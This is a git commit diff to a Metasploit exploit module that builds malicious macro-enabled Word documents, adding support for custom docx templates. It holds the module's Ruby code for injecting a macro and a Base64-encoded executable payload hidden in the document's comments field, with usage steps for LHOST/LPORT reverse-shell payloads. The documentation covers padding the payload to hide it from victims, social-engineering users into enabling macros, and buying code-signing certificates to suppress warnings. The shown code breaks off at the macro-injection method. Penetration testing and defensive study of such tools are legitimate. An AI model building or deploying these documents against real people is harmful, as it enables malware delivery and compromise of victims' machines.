Update office_word_macro exploit to support template injection
parent
e4ea618edf
commit
ee13195760
|
@ -1,2 +0,0 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
|
||||||
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/><Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>
|
|
|
@ -1,2 +0,0 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
|
||||||
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>
|
|
|
@ -0,0 +1,13 @@
|
||||||
|
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||||
|
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
|
||||||
|
<dc:title/>
|
||||||
|
<dc:subject/>
|
||||||
|
<dc:creator/>
|
||||||
|
<cp:keywords/>
|
||||||
|
<dc:description></dc:description>
|
||||||
|
<cp:lastModifiedBy>Nobody</cp:lastModifiedBy>
|
||||||
|
<cp:revision>1</cp:revision>
|
||||||
|
<dcterms:created xsi:type="dcterms:W3CDTF">2017-05-25T19:12:00Z</dcterms:created>
|
||||||
|
<dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-25T19:28:00Z</dcterms:modified>
|
||||||
|
<cp:category/>
|
||||||
|
</cp:coreProperties>
|
|
@ -1,2 +0,0 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
|
||||||
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal.dotm</Template><TotalTime>105</TotalTime><Pages>1</Pages><Words>1</Words><Characters>10</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>1</Lines><Paragraphs>1</Paragraphs><ScaleCrop>false</ScaleCrop><HeadingPairs><vt:vector size="2" baseType="variant"><vt:variant><vt:lpstr>Title</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant></vt:vector></HeadingPairs><TitlesOfParts><vt:vector size="1" baseType="lpstr"><vt:lpstr></vt:lpstr></vt:vector></TitlesOfParts><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>10</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>15.0000</AppVersion></Properties>
|
|
|
@ -1,2 +0,0 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
|
||||||
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><dc:creator>Windows User</dc:creator><cp:keywords></cp:keywords><dc:description> PAYLOADGOESHERE</dc:description><cp:lastModifiedBy>Windows User</cp:lastModifiedBy><cp:revision>32</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2017-02-01T20:39:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-02T22:26:00Z</dcterms:modified></cp:coreProperties>
|
|
Binary file not shown.
|
@ -1,2 +1,2 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||||
<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>
|
<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>
|
Binary file not shown.
|
@ -1,2 +0,0 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
|
||||||
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/></Relationships>
|
|
|
@ -1,2 +0,0 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
|
||||||
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><w:body><w:p w:rsidR="00A31ED0" w:rsidRDefault="00366A6C"><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:bookmarkEnd w:id="0"/><w:r><w:t>DOCBODYGOESHER</w:t></w:r></w:p><w:sectPr w:rsidR="00A31ED0"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>
|
|
|
@ -1,2 +0,0 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
|
||||||
<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15"><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E10002FF" w:usb1="4000ACFF" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Calibri Light"><w:panose1 w:val="020F0302020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font></w:fonts>
|
|
|
@ -1,2 +0,0 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
|
||||||
<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14 w15"><w:zoom w:percent="100"/><w:proofState w:spelling="clean" w:grammar="clean"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:compat><w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="15"/><w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="differentiateMultirowTableHeaders" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/></w:compat><w:rsids><w:rsidRoot w:val="0075759D"/><w:rsid w:val="000446F5"/><w:rsid w:val="00364989"/><w:rsid w:val="00366A6C"/><w:rsid w:val="003925D3"/><w:rsid w:val="00472204"/><w:rsid w:val="004929CB"/><w:rsid w:val="004937C6"/><w:rsid w:val="004E70C7"/><w:rsid w:val="00556042"/><w:rsid w:val="005C1470"/><w:rsid w:val="00634AFC"/><w:rsid w:val="0075759D"/><w:rsid w:val="008352C1"/><w:rsid w:val="008D18EE"/><w:rsid w:val="008F274A"/><w:rsid w:val="009337EB"/><w:rsid w:val="00965754"/><w:rsid w:val="00A31ED0"/><w:rsid w:val="00AA0D43"/><w:rsid w:val="00BD14BB"/><w:rsid 
w:val="00C22BA6"/><w:rsid w:val="00D4037B"/><w:rsid w:val="00DD6E1E"/><w:rsid w:val="00E636EA"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="0"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:shapeDefaults><o:shapedefaults v:ext="edit" spidmax="1026"/><o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout></w:shapeDefaults><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/><w15:chartTrackingRefBased/><w15:docId w15:val="{0E28A8EC-7E3E-41BD-9D1E-ADE8B995AEE4}"/></w:settings>
|
|
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
Binary file not shown.
|
@ -1,2 +0,0 @@
|
||||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
|
||||||
<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15"><w:optimizeForBrowser/><w:relyOnVML/><w:allowPNG/></w:webSettings>
|
|
|
@ -1,13 +1,16 @@
|
||||||
|
|
||||||
## Description
|
## Description
|
||||||
|
|
||||||
This module generates a macro-enabled Microsoft Office Word document. It does not target a specific
|
This module generates a macro-enabled Microsoft Office Word document (docm). It does not target a
|
||||||
CVE or vulnerability, this is more of a feature-abuse in Office, however this type of
|
specific CVE or vulnerability, instead it's more of a feature-abuse in Office, and yet it's still a
|
||||||
social-engineering attack still remains common today.
|
popular type of social-engineering attack such as in ransomware.
|
||||||
|
|
||||||
There are many ways to create this type of malicious doc. The module injects the Base64-encoded
|
By default, the module uses a built-in Office document (docx) as the template. It injects the
|
||||||
payload in the comments field, which will get decoded back by the macro and executed as a Windows
|
Base64-encoded payload into the comments field, which will get decoded back by the macro and executed
|
||||||
executable when the Office document is launched.
|
as a Windows executable when the Office document is launched.
|
||||||
|
|
||||||
|
If you do not wish to use the built-in docx template, you can also choose your own. Please see more
|
||||||
|
details below.
|
||||||
|
|
||||||
|
|
||||||
## Vulnerable Application
|
## Vulnerable Application
|
||||||
|
@ -22,58 +25,74 @@ Specifically, this module was tested specifically against:
|
||||||
* Microsoft Office 2016.
|
* Microsoft Office 2016.
|
||||||
* Microsoft Office Word 15.29.1 (161215).
|
* Microsoft Office Word 15.29.1 (161215).
|
||||||
|
|
||||||
|
## Building the Office Document Template
|
||||||
|
|
||||||
|
It is recommended that you build your Office document (docx) template from either one of these
|
||||||
|
applications:
|
||||||
|
|
||||||
|
* Google Docs
|
||||||
|
* Microsoft Office Word
|
||||||
|
|
||||||
|
**Google Docs**
|
||||||
|
|
||||||
|
Google Docs is ideal in case you don't have Microsoft Office available.
|
||||||
|
|
||||||
|
Before you start, make sure you have a Gmail account.
|
||||||
|
|
||||||
|
Next, to create a new document, please go to the following:
|
||||||
|
|
||||||
|
[https://docs.google.com/document/?usp=mkt_docs](https://docs.google.com/document/?usp=mkt_docs)
|
||||||
|
|
||||||
|
To save the document as a docx on Google docs:
|
||||||
|
|
||||||
|
1. Click on File
|
||||||
|
2. Go to Download as
|
||||||
|
3. Click on Microsoft Word (.docx)
|
||||||
|
|
||||||
|
**Microsoft Office Word**
|
||||||
|
|
||||||
|
If you already have Microsoft Office, you can use it to create a docx file and use it as a template.
|
||||||
|
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
|
**To use the default template**
|
||||||
|
|
||||||
1. ```use exploit/multi/fileformat/office_word_macro```
|
1. ```use exploit/multi/fileformat/office_word_macro```
|
||||||
2. ```set PAYLOAD [PAYLOAD NAME]```
|
2. ```set PAYLOAD [PAYLOAD NAME]```
|
||||||
3. Configure the rest of the settings accordingly (BODY, LHOST, LPORT, etc)
|
3. Configure the rest of the settings accordingly (LHOST, LPORT, etc)
|
||||||
4. ```exploit```
|
4. ```exploit```
|
||||||
5. The module should generate the malicious docm.
|
5. The module should generate the malicious docm.
|
||||||
|
|
||||||
|
**To use the custom template**
|
||||||
|
|
||||||
|
1. ```use exploit/multi/fileformat/office_word_macro```
|
||||||
|
2. ```set PAYLOAD [PAYLOAD NAME]```
|
||||||
|
3. ```set CUSTOMTEMPLATE [DOCX PATH]```
|
||||||
|
4. Configure the rest of the settings accordingly
|
||||||
|
5. ```exploit```
|
||||||
|
6. The module should generate the malicious docm.
|
||||||
|
|
||||||
## Options
|
## Options
|
||||||
|
|
||||||
**BODY** Text to put in the Office document. See **Modification** below if you wish to modify more.
|
**CUSTOMTEMPLATE** A docx file that will be used as a template to build the exploit.
|
||||||
|
|
||||||
## Demo
|
|
||||||
|
|
||||||
In this example, first we generate the malicious docm exploit, and then we set up a
|
|
||||||
windows/meterpreter/reverse_tcp handler to receive a session. Next, we copy the docm
|
|
||||||
exploit to a Windows machine with Office 2013 installed, when the document runs the
|
|
||||||
macro, we get a session:
|
|
||||||
|
|
||||||
![macro_demo](https://cloud.githubusercontent.com/assets/1170914/22602348/751f9d66-ea08-11e6-92ce-4e52f88aaebf.gif)
|
|
||||||
|
|
||||||
## Modification
|
|
||||||
|
|
||||||
To use this exploit in a real environment, you will most likely need to modify the docm content.
|
|
||||||
Here's one approach you can do:
|
|
||||||
|
|
||||||
1. Use the module to generate the malicious docm
|
|
||||||
2. Copy the malicious docm to the vulnerable machine, and edit it with Microsoft Office (such as 2013).
|
|
||||||
When you open the document, the payload will probably do something on your machine. It's ok,
|
|
||||||
since you generated it, it should not cause any problems for you.
|
|
||||||
3. Save the doc, and test again to make sure the payload still works.
|
|
||||||
|
|
||||||
While editing, you should avoid modifying the following unless you are an advanced user:
|
|
||||||
|
|
||||||
* The comments field. If you have to modify this, make sure to create 55 empty spaces
|
|
||||||
in front of the payload string. The blank space is for making the payload less obvious
|
|
||||||
at first sight if the user views the file properties.
|
|
||||||
* The VB code in the macro.
|
|
||||||
|
|
||||||
## Trusted Document
|
## Trusted Document
|
||||||
|
|
||||||
By default, Microsoft Office does not execute macros automatically unless it is considered as a
|
By default, Microsoft Office does not execute macros automatically unless it is considered as a
|
||||||
trusted document. This means that if a macro is present, the user will most likely need to manually
|
trusted document. This means that if a macro is present, the user will most likely need to manually
|
||||||
click on the "Enable Content" button in order to run the macro.
|
click on the "Enable Content" or "Enable Macro" button in order to run the macro.
|
||||||
|
|
||||||
Many in-the-wild attacks face this type of challenge, and most rely on social-engineering to trick
|
Many in-the-wild attacks face this type of challenge, and most rely on social-engineering to trick
|
||||||
the user into allowing the macro to run. For example, making the document look like something
|
the user into allowing the macro to run. For example, making the document look like something
|
||||||
written from a legit source, such as [this attack](https://motherboard.vice.com/en_us/article/these-hackers-cleverly-disguised-their-malware-as-a-document-about-trumps-victory).
|
written from a legit source, such as [this attack](https://motherboard.vice.com/en_us/article/these-hackers-cleverly-disguised-their-malware-as-a-document-about-trumps-victory).
|
||||||
|
|
||||||
To truly make the macro document to run without any warnings, you must somehow figure out a way to
|
To truly make the macro document run without any warnings, you must somehow figure out a way to
|
||||||
sign the macro by a trusted publisher, or using a certificate that the targeted machine trusts.
|
sign the macro by a trusted publisher, or using a certificate that the targeted machine trusts.
|
||||||
|
|
||||||
|
If money is not an issue, you can easily buy a certificate on-line:
|
||||||
|
[https://www.sslshopper.com/microsoft-vba-code-signing-certificates.html](https://www.sslshopper.com/microsoft-vba-code-signing-certificates.html)
|
||||||
|
|
||||||
For testing purposes, another way to have a certificate is to create a self-signed one using
|
For testing purposes, another way to have a certificate is to create a self-signed one using
|
||||||
Microsoft Office's SELFCERT.exe utility. This tool can be found in the following path on
|
Microsoft Office's SELFCERT.exe utility. This tool can be found in the following path on
|
||||||
Windows:
|
Windows:
|
||||||
|
|
|
@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => "Microsoft Office Word Malicious Macro Execution",
|
'Name' => "Microsoft Office Word Malicious Macro Execution",
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module generates a macro-enabled Microsoft Office Word document. The comments
|
This module injects a malicious macro into a Microsoft Office Word document (docx). The
|
||||||
metadata in the data is injected with a Base64 encoded payload, which will be
|
comments field in the metadata is injected with a Base64 encoded payload, which will be
|
||||||
decoded by the macro and execute as a Windows executable.
|
decoded by the macro and execute as a Windows executable.
|
||||||
|
|
||||||
For a successful attack, the victim is required to manually enable macro execution.
|
For a successful attack, the victim is required to manually enable macro execution.
|
||||||
|
@ -56,64 +56,226 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
))
|
))
|
||||||
|
|
||||||
register_options([
|
register_options([
|
||||||
OptString.new("BODY", [false, 'The message for the document body',
|
OptPath.new("CUSTOMTEMPLATE", [false, 'A docx file that will be used as a template to build the exploit']),
|
||||||
'Contents of this document are protected. Please click Enable Content to continue.'
|
OptString.new('FILENAME', [true, 'The Office document macro file (docm)', 'msf.docm'])
|
||||||
]),
|
|
||||||
OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
|
|
||||||
])
|
])
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def get_file_in_docx(fname)
|
||||||
|
i = @docx.find_index { |item| item[:fname] == fname }
|
||||||
|
|
||||||
def on_file_read(short_fname, full_fname)
|
unless i
|
||||||
buf = File.read(full_fname)
|
fail_with(Failure::NotFound, "This template cannot be used because it is missing: #{fname}")
|
||||||
|
|
||||||
case short_fname
|
|
||||||
when /document\.xml/
|
|
||||||
buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
|
|
||||||
when /core\.xml/
|
|
||||||
p = target.name =~ /Python/ ? payload.encoded : generate_payload_exe
|
|
||||||
b64_payload = ' ' * 55
|
|
||||||
b64_payload << Rex::Text.encode_base64(p)
|
|
||||||
buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
|
|
||||||
end
|
end
|
||||||
|
|
||||||
# The original filename of __rels is actually ".rels".
|
@docx.fetch(i)[:data]
|
||||||
# But for some reason if that's our original filename, it won't be included
|
|
||||||
# in the archive. So this hacks around that.
|
|
||||||
case short_fname
|
|
||||||
when /__rels/
|
|
||||||
short_fname.gsub!(/\_\_rels/, '.rels')
|
|
||||||
end
|
|
||||||
|
|
||||||
yield short_fname, buf
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def add_content_type_extension(extension, content_type)
|
||||||
|
if has_content_type_extension?(extension)
|
||||||
|
update_content_type("Types//Default[@Extension=\"#{extension}\"]", 'ContentType', content_type)
|
||||||
|
else
|
||||||
|
xml = get_file_in_docx('[Content_Types].xml')
|
||||||
|
types_node = xml.at('Types')
|
||||||
|
|
||||||
def package_docm(path)
|
unless types_node
|
||||||
zip = Rex::Zip::Archive.new
|
fail_with(Failure::NotFound, '[Content_Types].xml is missing the Types node.')
|
||||||
|
end
|
||||||
|
|
||||||
Dir["#{path}/**/**"].each do |file|
|
child_data = "<Default Extension=\"#{extension}\" ContentType=\"#{content_type}\"/>"
|
||||||
p = file.sub(path+'/','')
|
types_node.add_child(child_data)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
if File.directory?(file)
|
def has_content_type_extension?(extension)
|
||||||
print_status("Packaging directory: #{file}")
|
xml = get_file_in_docx('[Content_Types].xml')
|
||||||
zip.add_file(p)
|
xml.at("Types//Default[@Extension=\"#{extension}\"]") ? true : false
|
||||||
else
|
end
|
||||||
on_file_read(p, file) do |fname, buf|
|
|
||||||
print_status("Packaging file: #{fname}")
|
def add_content_type_partname(part_name, content_type)
|
||||||
zip.add_file(fname, buf)
|
ctype_xml = get_file_in_docx('[Content_Types].xml')
|
||||||
|
types_node = ctype_xml.at('Types')
|
||||||
|
|
||||||
|
unless types_node
|
||||||
|
fail_with(Failure::NotFound, '[Content_Types].xml is missing the Types node.')
|
||||||
|
end
|
||||||
|
|
||||||
|
child_data = "<Override PartName=\"#{part_name}\" ContentType=\"#{content_type}\"/>"
|
||||||
|
types_node.add_child(child_data)
|
||||||
|
end
|
||||||
|
|
||||||
|
def update_content_type(pattern, attribute, new_value)
|
||||||
|
ctype_xml = get_file_in_docx('[Content_Types].xml')
|
||||||
|
doc_xml_ctype_node = ctype_xml.at(pattern)
|
||||||
|
if doc_xml_ctype_node
|
||||||
|
doc_xml_ctype_node.attributes[attribute].value = new_value
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def add_rels_relationship(type, target)
|
||||||
|
rels_xml = get_file_in_docx('_rels/.rels')
|
||||||
|
relationships_node = rels_xml.at('Relationships')
|
||||||
|
|
||||||
|
unless relationships_node
|
||||||
|
fail_with(Failure::NotFound, '_rels/.rels is missing the Relationships node')
|
||||||
|
end
|
||||||
|
|
||||||
|
last_index = get_last_relationship_index_from_rels
|
||||||
|
relationships_node.add_child("<Relationship Id=\"rId#{last_index+1}\" Type=\"#{type}\" Target=\"#{target}\"/>")
|
||||||
|
end
|
||||||
|
|
||||||
|
def add_doc_relationship(type, target)
|
||||||
|
rels_xml = get_file_in_docx('word/_rels/document.xml.rels')
|
||||||
|
relationships_node = rels_xml.at('Relationships')
|
||||||
|
|
||||||
|
unless relationships_node
|
||||||
|
fail_with(Failure::NotFound, 'word/_rels/document.xml.rels is missing the Relationships node.')
|
||||||
|
end
|
||||||
|
|
||||||
|
last_index = get_last_relationship_index_from_doc_rels
|
||||||
|
relationships_node.add_child("<Relationship Id=\"rId#{last_index+1}\" Type=\"#{type}\" Target=\"#{target}\"/>")
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_last_relationship_index_from_rels
|
||||||
|
rels_xml = get_file_in_docx('_rels/.rels')
|
||||||
|
relationships_node = rels_xml.at('Relationships')
|
||||||
|
|
||||||
|
unless relationships_node
|
||||||
|
fail_with(Failure::NotFound, '_rels/.rels is missing the Relationships node')
|
||||||
|
end
|
||||||
|
|
||||||
|
relationships_node.search('Relationship').collect { |n|
|
||||||
|
n.attributes['Id'].value.scan(/(\d+)/).flatten.first.to_i
|
||||||
|
}.max
|
||||||
|
end
|
||||||
|
|
||||||
|
def get_last_relationship_index_from_doc_rels
|
||||||
|
rels_xml = get_file_in_docx('word/_rels/document.xml.rels')
|
||||||
|
relationships_node = rels_xml.at('Relationships')
|
||||||
|
|
||||||
|
unless relationships_node
|
||||||
|
fail_with(Failure::NotFound, 'word/_rels/document.xml.rels is missing the Relationships node')
|
||||||
|
end
|
||||||
|
|
||||||
|
relationships_node.search('Relationship').collect { |n|
|
||||||
|
n.attributes['Id'].value.scan(/(\d+)/).flatten.first.to_i
|
||||||
|
}.max
|
||||||
|
end
|
||||||
|
|
||||||
|
def inject_macro
|
||||||
|
